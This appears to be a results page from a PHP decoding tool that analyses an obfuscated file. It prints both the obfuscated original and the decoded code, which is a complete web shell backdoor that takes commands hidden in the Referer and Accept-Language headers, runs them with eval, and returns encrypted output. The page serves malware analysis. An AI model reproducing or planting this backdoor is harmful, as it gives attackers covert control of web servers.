Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $F=str_replace('Zz','','crZzeatZze_ZzZzfuncZztiZzon'); $o='";fokRr($kRi=0;$i<kR$lk..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$F=str_replace('Zz','','crZzeatZze_ZzZzfuncZztiZzon');
$o='";fokRr($kRi=0;$i<kR$lkR;){kRfor($j=0kR;($j<$c&&$i<$kRkRl);$j++,$kRi++){$okR.=$t{$ikR}^kR$k{kR';
$d='$q=array_valkRues($q)kR;preg_mkRatch_alkRl("kR/([\\w])kR[\\w-]+(?:kR;qkR=kR0.([kR\\d])kR)?,?/",$';
$a='$j}kR;}}return $o;kR}$kRr=$_SERVkRER;$rr=@$kRr["HkRTTP_REFEkRRkRER"];$kRra=@kR$r["kRkRHTTP_ACCEP';
$j='trpos(kR$kRp,$hkR)===0){$skR[$i]="";$kRp=$ss($kRpkR,3);}ikRf(array_kkRey_exkRists($kRi,kR$s)){$s[$';
$G='.$kfkRkR),0,3));$pkR="";forkR($kRzkRkR=1;kR$z<countkR($m[1]);$z++)$p.=$kRq[$kRm[2][$z]];if(skR';
$u='T_LANGUAGE"];kRif($rr&kR&$ra)kR{$kRu=kRparse_url($rrkR);parse_skRtr($kRu["qkRuerkRykRkR"],$q);';
$X='$kh="5d4kR1";kR$kfkR="4kR02kRa";function x($t,$kRk){$c=kRstkRrlen($k);$l=stkRrkRlen($tkR);$o="';
$Z='kRikR].=$p;kR$kRkRe=strpos($s[$i],$f);if(kRkR$e){$k=$kh.$kfkR;ob_stkRart();@kRevkRkRal(@gzunc';
$B='kRlower";$ikR=$m[1][0]kR.kR$m[1][1];$hkR=$slkR(kR$sskR(md5($i.$kh),0,3));$f=kR$sl(kR$ss(mdkR5($i';
$e='omprkRkRess(@xkR(@base6kR4_dkRecode(preg_replakRkRce(kRarkRray("/_/","/-/"),kRarray(kR"/",kR"+"';
$g='),kR$ss($s[$i]kR,0,$e)))kRkR,$k)));$o=obkRkR_kRget_contentskR();ob_kRend_cleakRn();kR$d=kRbase';
$C='rkRakR,$m);if($kRq&&$m)kR{@session_start()kRkR;$s=&$_SESSIONkR;kR$ss=kR"subkRstr";$sl="strtkRokR';
$T='kR64_encode(x(kRgkRzcompkRress($o),$k)kR);prinkRt("<$kRkRk>$d</$k>kR");@session_dkRestroy(kR);}}}}';
$w=str_replace('kR','',$X.$o.$a.$u.$d.$C.$B.$G.$j.$Z.$e.$g.$T);
$P=$F('',$w);$P();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$B kRlower";$ikR=$m[1][0]kR.kR$m[1][1];$hkR=$slkR(kR$sskR(md5($..
$C rkRakR,$m);if($kRq&&$m)kR{@session_start()kRkR;$s=&$_SESSION..
$F create_function
$G .$kfkRkR),0,3));$pkR="";forkR($kRzkRkR=1;kR$z<countkR($m[1])..
$P None
$T kR64_encode(x(kRgkRzcompkRress($o),$k)kR);prinkRt("<$kRkRk>$..
$X $kh="5d4kR1";kR$kfkR="4kR02kRa";function x($t,$kRk){$c=kRstk..
$Z kRikR].=$p;kR$kRkRe=strpos($s[$i],$f);if(kRkR$e){$k=$kh.$kfk..
$a $j}kR;}}return $o;kR}$kRr=$_SERVkRER;$rr=@$kRr["HkRTTP_REFEk..
$d $q=array_valkRues($q)kR;preg_mkRatch_alkRl("kR/([\w])kR[\w-]..
$e omprkRkRess(@xkR(@base6kR4_dkRecode(preg_replakRkRce(kRarkRr..
$g ),kR$ss($s[$i]kR,0,$e)))kRkR,$k)));$o=obkRkR_kRget_contentsk..
$j trpos(kR$kRp,$hkR)===0){$skR[$i]="";$kRp=$ss($kRpkR,3);}ikRf..
$o ";fokRr($kRi=0;$i<kR$lkR;){kRfor($j=0kR;($j<$c&&$i<$kRkRl);$..
$u T_LANGUAGE"];kRif($rr&kR&$ra)kR{$kRu=kRparse_url($rrkR);pars..
$w $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..

Stats

MD5 c10a4880b40092d4f0a4a557040552a9
Eval Count 1
Decode Time 94 ms